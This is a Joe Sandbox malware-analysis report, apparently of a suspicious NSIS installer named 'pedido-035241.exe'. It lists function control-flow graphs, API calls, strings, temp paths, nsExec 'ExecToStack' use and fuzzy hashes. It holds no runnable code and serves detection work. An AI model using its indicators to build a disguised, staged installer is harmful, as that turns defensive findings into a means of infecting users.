                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pedido-035241.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                            • API String ID: 2803837635-2970656598
                                                                                                                                                                            • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                            • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                                                                                                                                            • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                            • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                                                                                                                                            Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 442 406544-40654f 443 406551-406560 442->443 444 406562-406578 442->444 443->444 445 406590-406599 444->445 446 40657a-406587 444->446 448 406774-40677f 445->448 449 40659f 445->449 446->445 447 406589-40658c 446->447 447->445 451 406781-406785 call 406507 448->451 452 40678a-40678b 448->452 450 4065a4-4065b1 449->450 450->448 453 4065b7-4065c0 450->453 451->452 455 406752 453->455 456 4065c6-406603 453->456 457 406760-406763 455->457 458 406754-40675e 455->458 459 4066f6-4066fb 456->459 460 406609-406610 456->460 461 406765-40676e 457->461 458->461 462 4066fd-406703 459->462 463 40672e-406733 459->463 464 406612-406614 460->464 465 406615-406617 460->465 461->448 466 4065a1 461->466 467 406713-40671f call 406507 462->467 468 406705-406711 call 40644e 462->468 471 406742-406750 lstrlenW 463->471 472 406735-40673d call 406544 463->472 464->465 469 406654-406657 465->469 470 406619-406637 call 4063d5 465->470 466->450 483 406724-40672a 467->483 468->483 473 406667-40666a 469->473 474 406659-406665 GetSystemDirectoryW 469->474 484 40663c-406640 470->484 471->461 472->471 480 4066d3-4066d5 473->480 481 40666c-40667a GetWindowsDirectoryW 473->481 479 4066d7-4066db 474->479 487 4066dd-4066e1 479->487 488 4066ee-4066f4 call 40678e 479->488 480->479 486 40667c-406684 480->486 481->480 483->471 485 40672c 483->485 484->487 489 406646-40664f call 406544 484->489 485->488 493 406686-40668f 486->493 494 40669b-4066b1 SHGetSpecialFolderLocation 486->494 487->488 490 4066e3-4066e9 lstrcatW 487->490 488->471 489->479 490->488 499 406697-406699 493->499 497 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 494->497 498 4066cf 494->498 497->479 497->498 498->480 499->479 499->494
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                            • API String ID: 4260037668-905382516
                                                                                                                                                                            • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                                                                                                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 564 40176f-401794 call 402da6 call 405e4d 569 401796-40179c call 406507 564->569 570 40179e-4017b0 call 406507 call 405dd6 lstrcatW 564->570 575 4017b5-4017b6 call 40678e 569->575 570->575 579 4017bb-4017bf 575->579 580 4017c1-4017cb call 40683d 579->580 581 4017f2-4017f5 579->581 588 4017dd-4017ef 580->588 589 4017cd-4017db CompareFileTime 580->589 582 4017f7-4017f8 call 405fd2 581->582 583 4017fd-401819 call 405ff7 581->583 582->583 591 40181b-40181e 583->591 592 40188d-4018b6 call 405569 call 4032b4 583->592 588->581 589->588 593 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 591->593 594 40186f-401879 call 405569 591->594 604 4018b8-4018bc 592->604 605 4018be-4018ca SetFileTime 592->605 593->579 626 401864-401865 593->626 606 401882-401888 594->606 604->605 608 4018d0-4018db CloseHandle 604->608 605->608 609 402c33 606->609 611 4018e1-4018e4 608->611 612 402c2a-402c2d 608->612 613 402c35-402c39 609->613 616 4018e6-4018f7 call 406544 lstrcatW 611->616 617 4018f9-4018fc call 406544 611->617 612->609 623 401901-4023a2 call 405b67 616->623 617->623 623->612 623->613 626->606 628 401867-401868 626->628 628->594
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,?,00000031), ref: 004017B0
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,?,00000031), ref: 004017D5
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene$C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                            • API String ID: 1941528284-1436347379
                                                                                                                                                                            • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                            • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                                                                                                                                            Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                            • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                            • lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                            • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                            • String ID: Completed
                                                                                                                                                                            • API String ID: 1495540970-3087654605
                                                                                                                                                                            • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                            • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                                                                                                                                            Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033e8 MulDiv wsprintfW call 405569 693->695 694->692 694->695 702 4033ed 695->702 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 702->692 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                                                                            • String ID: ... %d%%$G8@
                                                                                                                                                                            • API String ID: 551687249-649311722
                                                                                                                                                                            • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                                                                                                                                            Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 714 40689e-4068d1 wsprintfW LoadLibraryExW 711->714 712->711 713 406897-406899 712->713 713->714
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                            • wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                                                                                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                                                                                                                                            Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405A8F
                                                                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AAE
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3449924974-3081826266
                                                                                                                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                                                                                                                                            Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 721 406026-406032 722 406033-406067 GetTickCount GetTempFileNameW 721->722 723 406076-406078 722->723 724 406069-40606b 722->724 725 406070-406073 723->725 724->722 726 40606d 724->726 726->725
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00406044
                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
